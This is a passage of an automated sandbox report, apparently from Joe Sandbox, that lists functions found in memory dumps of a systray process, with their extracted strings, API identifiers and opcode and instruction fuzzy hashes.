                                  • Associated: 00000008.00000002.3262787316.00000000052F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.00000000052FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.000000000536E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_51d0000_systray.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                  • Instruction ID: 606170723cf083d14e08eab2be9731ee7a44670ed476ef4d7bc54db78addad6d
                                  • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                  • Instruction Fuzzy Hash: E7020471628342AFC309CF58C494E6AFBE5FFC8704F14892DB9895B264DB35E905CB62
                                  Function 0524B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3262787316.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051D0000, based on PE: true
                                  • Associated: 00000008.00000002.3262787316.00000000052F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.00000000052FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.000000000536E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_51d0000_systray.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-$0$0
                                  • API String ID: 1302938615-699404926
                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                  • Instruction ID: 11468c7747600ad2098f5e9cf1b74f84503a295145be2ea3634f099147f81de1
                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                  • Instruction Fuzzy Hash: F381A171E2924A9EDF2DCF68C891BFEBBA2BF45310F184119D896A7291C774D841CF50
                                  Function 052B20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3262787316.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051D0000, based on PE: true
                                  • Associated: 00000008.00000002.3262787316.00000000052F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.00000000052FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.000000000536E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_51d0000_systray.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$[$]:%u
                                  • API String ID: 48624451-2819853543
                                  • Opcode ID: b07c08e60416847a69412120a1b0c47f7a8c8c6e1a6964b1bdcde6000443b974
                                  • Instruction ID: 3b7cbc98773f22bc3302190a5209b3a2a7afbaa73e70cc55323197a63a001497
                                  • Opcode Fuzzy Hash: b07c08e60416847a69412120a1b0c47f7a8c8c6e1a6964b1bdcde6000443b974
                                  • Instruction Fuzzy Hash: F621777AA20219EBDB10DF79DC44AFEB7F9EF44794F040116EA15E3201E770D9028BA1
                                  Function 0522F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                  Download Yara Rule
                                  Strings
                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 052702BD
                                  • RTL: Re-Waiting, xrefs: 0527031E
                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 052702E7
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3262787316.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051D0000, based on PE: true
                                  • Associated: 00000008.00000002.3262787316.00000000052F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.00000000052FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.000000000536E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_51d0000_systray.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                  • API String ID: 0-2474120054
                                  • Opcode ID: a8a6552dee1e50bc84545fd36d78c878bcb9361ea06d153a58ddb9358e7cadae
                                  • Instruction ID: 81df31d17a8419bcda715e65d3c5462f98f720d5fd0c3ca99f3df558ea728c3b
                                  • Opcode Fuzzy Hash: a8a6552dee1e50bc84545fd36d78c878bcb9361ea06d153a58ddb9358e7cadae
                                  • Instruction Fuzzy Hash: 00E19E35628742AFD725CF28C989B2AB7F1FF44714F144A29F5A98B2D0D7B4E844CB42
                                  Function 0523BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                  Download Yara Rule
                                  Strings
                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 05277B7F
                                  • RTL: Resource at %p, xrefs: 05277B8E
                                  • RTL: Re-Waiting, xrefs: 05277BAC
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3262787316.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051D0000, based on PE: true
                                  • Associated: 00000008.00000002.3262787316.00000000052F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.00000000052FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.000000000536E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_51d0000_systray.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 0-871070163
                                  • Opcode ID: 5f0c4b0746ffa98c54c43884db00eebdaf6ce7222cc811a888131a095c68ec78
                                  • Instruction ID: 2eb319a04270847e3d8804f982b29a5ad25de4864c9320833dc637e2c4dbcd0e
                                  • Opcode Fuzzy Hash: 5f0c4b0746ffa98c54c43884db00eebdaf6ce7222cc811a888131a095c68ec78
                                  • Instruction Fuzzy Hash: 9841DC713257079FC724DE29C841F6AB7E6FF88721F100A2DF95A9B280DB71E8058B91
                                  Function 0523B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                  Download Yara Rule
                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0527728C
                                  Strings
                                  • RTL: Resource at %p, xrefs: 052772A3
                                  • RTL: Re-Waiting, xrefs: 052772C1
                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 05277294
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3262787316.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051D0000, based on PE: true
                                  • Associated: 00000008.00000002.3262787316.00000000052F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.00000000052FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.000000000536E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_51d0000_systray.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 885266447-605551621
                                  • Opcode ID: 63de7c3305ef2404f102ed2fdbc5f00dd92215054dfc265907a05412cdeb42ee
                                  • Instruction ID: 35a5cd25d2c5ffe5b87288eaed5cc83cc383f4fa81349a6fdb5899b175233e4d
                                  • Opcode Fuzzy Hash: 63de7c3305ef2404f102ed2fdbc5f00dd92215054dfc265907a05412cdeb42ee
                                  • Instruction Fuzzy Hash: 37410271724206ABC720DE25CC46F66B7A6FF84710F140619FD69EB280DB71E842CBD0
                                  Function 052B2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3262787316.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051D0000, based on PE: true
                                  • Associated: 00000008.00000002.3262787316.00000000052F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.00000000052FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.000000000536E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_51d0000_systray.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$]:%u
                                  • API String ID: 48624451-3050659472
                                  • Opcode ID: 8fd93a43e2edf3461142fe357a7fe9cda4ac1ac1afc665afa75c46a7c445e227
                                  • Instruction ID: ebe7d0513802fa4c7df5e265561527da6fa65b5ab4a88da5675bda74a5ec4a85
                                  • Opcode Fuzzy Hash: 8fd93a43e2edf3461142fe357a7fe9cda4ac1ac1afc665afa75c46a7c445e227
                                  • Instruction Fuzzy Hash: CE318476A20219DFDB24DF28DC44BEEB7B8FF44750F440556E849E3240EB70AA458FA0
                                  Function 05247D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3262787316.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051D0000, based on PE: true
                                  • Associated: 00000008.00000002.3262787316.00000000052F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.00000000052FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.000000000536E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_51d0000_systray.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-
                                  • API String ID: 1302938615-2137968064
                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                  • Instruction ID: 7ab0e6ae71af70130771c3b0cf45b1db74d0e4be01b3a1c320728756cec4332b
                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                  • Instruction Fuzzy Hash: 46918770F342179ADB2CDE69C880ABE77A5FF44720F59461AE879A72C0D77099438F50
                                  Function 05209126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3262787316.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051D0000, based on PE: true
                                  • Associated: 00000008.00000002.3262787316.00000000052F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.00000000052FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.000000000536E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_51d0000_systray.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $$@
                                  • API String ID: 0-1194432280
                                  • Opcode ID: bb30de343ec3f3f525203198b5eda82b39267e86d451bc3ac4b9a95cf0341c8c
                                  • Instruction ID: b2df87301e4bf53ea4b1e2378f6979aee47ab46aa35d1c2a5405a0a7086dda41
                                  • Opcode Fuzzy Hash: bb30de343ec3f3f525203198b5eda82b39267e86d451bc3ac4b9a95cf0341c8c
                                  • Instruction Fuzzy Hash: B3812A75E11269DBDB25CB54CC48BEAB6B4AF08710F0041EAA90AB7281D7705EC4CFA0
                                  Function 0528CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                  Download Yara Rule
                                  APIs
                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 0528CFBD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3262787316.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051D0000, based on PE: true
                                  • Associated: 00000008.00000002.3262787316.00000000052F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.00000000052FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.000000000536E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_51d0000_systray.jbxd
                                  Similarity
                                  • API ID: CallFilterFunc@8
                                  • String ID: @$@4Qw@4Qw
                                  • API String ID: 4062629308-2383119779
                                  • Opcode ID: 56a00b2e07296448ab74656698a9a2672d4bae8a4a18786cb9a9bd58375e0413
                                  • Instruction ID: 13c4e2c63c33dfba8057af6750b5ab79d647ea65088ba639865c21a8168286d8
                                  • Opcode Fuzzy Hash: 56a00b2e07296448ab74656698a9a2672d4bae8a4a18786cb9a9bd58375e0413
                                  • Instruction Fuzzy Hash: 21419C71A21215DFCB21EFA9D844ABEBBF8FF54B10F00442AE905EB290D7709805CB65
                                  Function 04FC2ED5 Relevance: 5.2, Strings: 4, Instructions: 185COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3262372879.0000000004FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4fc0000_systray.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $$0$@$@
                                  • API String ID: 0-1132210376
                                  • Opcode ID: 9796e5ecfc82f8a49fe1b2cd6e0a897b3cf538387fce6730ea1967160aa56dc9
                                  • Instruction ID: c527e38665b388e881fa8ce310fcbecd45bc7b74761901ef024edfefbc4d49be
                                  • Opcode Fuzzy Hash: 9796e5ecfc82f8a49fe1b2cd6e0a897b3cf538387fce6730ea1967160aa56dc9
                                  • Instruction Fuzzy Hash: D051E2B5A187498FDB15CF18D98579EBBF4FB89700F10019EE84A93284DB35E506CBC1
                                  Function 04FC2C5F Relevance: 5.0, Strings: 4, Instructions: 31COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3262372879.0000000004FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4fc0000_systray.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ($*7$=$+!,9$am)(
                                  • API String ID: 0-3376412003
                                  • Opcode ID: 3f8d3b14a30f693e11860f0250d3e364dde79eab7c16df861a4bb87c99100961
                                  • Instruction ID: 7ebed32280bf40f5cb065c8675783a185cdd8637d7e106efe5c8b3c130339e74
                                  • Opcode Fuzzy Hash: 3f8d3b14a30f693e11860f0250d3e364dde79eab7c16df861a4bb87c99100961
                                  • Instruction Fuzzy Hash: ACF0EC30458B4447DB04BB18C84455A77D4FB8830CF40475DECCDD6151EE38D6068B4B
                                  Function 04FC2C08 Relevance: 5.0, Strings: 4, Instructions: 28COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3262372879.0000000004FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4fc0000_systray.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: "h$)$7,$J5|w$|w4L
                                  • API String ID: 0-4207384736
                                  • Opcode ID: 62520f62bd2017f7fb0ce9a71a3bdbe327a9c15035fb65f999d4ba6a3cb6069c
                                  • Instruction ID: 0face4e6f544b94e92354bf5f078e747cb7be4bbcb9cfee66b033fb4afaabaef
                                  • Opcode Fuzzy Hash: 62520f62bd2017f7fb0ce9a71a3bdbe327a9c15035fb65f999d4ba6a3cb6069c
                                  • Instruction Fuzzy Hash: C5F030385187884AD709AB24D45469ABBD4FBDC30CF900A5DE4C9EA161DA38D646CB8B